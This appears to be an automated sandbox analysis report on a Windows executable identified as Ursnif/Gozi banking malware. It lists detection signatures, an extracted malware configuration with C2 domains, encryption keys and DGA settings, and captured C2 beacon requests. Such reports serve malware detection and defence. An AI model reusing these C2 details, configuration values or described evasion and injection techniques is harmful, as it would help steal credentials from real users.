Windows Analysis Report FpYf5EGDO9.exe

Overview

General Information

Sample Name: FpYf5EGDO9.exe
Analysis ID: 527488
MD5: 2f1743897afa6f586ae97f53bf55c14e
SHA1: 21a51f4a3fa0c65509a1c7ef640f7e6b779aee49
SHA256: 440c297bcaa0e4ca3d84281d524b8351ad1ea2b5aabb22795db824a356cd54bd
Tags: exeGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.510101213.0000000002140000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}
Multi AV Scanner detection for submitted file
Source: FpYf5EGDO9.exe Virustotal: Detection: 46% Perma Link
Machine Learning detection for sample
Source: FpYf5EGDO9.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.FpYf5EGDO9.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.FpYf5EGDO9.exe.2140e50.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.FpYf5EGDO9.exe.2150000.0.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack
Uses 32bit PE files
Source: FpYf5EGDO9.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
Source: Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
Source: Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 44_2_0374A2FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 44_2_0373E9AC

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: lycos.com
Source: C:\Windows\explorer.exe Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe Domain query: www.lycos.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic HTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic HTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: M247GB M247GB
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 89.44.9.140 89.44.9.140
Source: Joe Sandbox View IP Address: 74.6.143.26 74.6.143.26
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000E.00000003.441167820.000001A9988C5000.00000004.00000001.sdmp String found in binary or memory: http://crl.micro
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.uxs
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/3
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1S
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.545761231.000001A980231000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lan
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8vo
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp String found in binary or memory: https://qoderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp String found in binary or memory: https://soderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://soderunovos.website/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3L
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp String found in binary or memory: https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctW
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp String found in binary or memory: https://soderunovos.websitehttps://qoderunovos.websiteo
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com//
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp, FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZiz
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/R
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqc
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/u
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp String found in binary or memory: https://yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000002.510452658.0000000002219000.00000004.00000001.sdmp String found in binary or memory: https://yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHL
Source: unknown DNS traffic detected: queries for: yahoo.com
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError, 0_2_03C45988
Source: global traffic HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic HTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
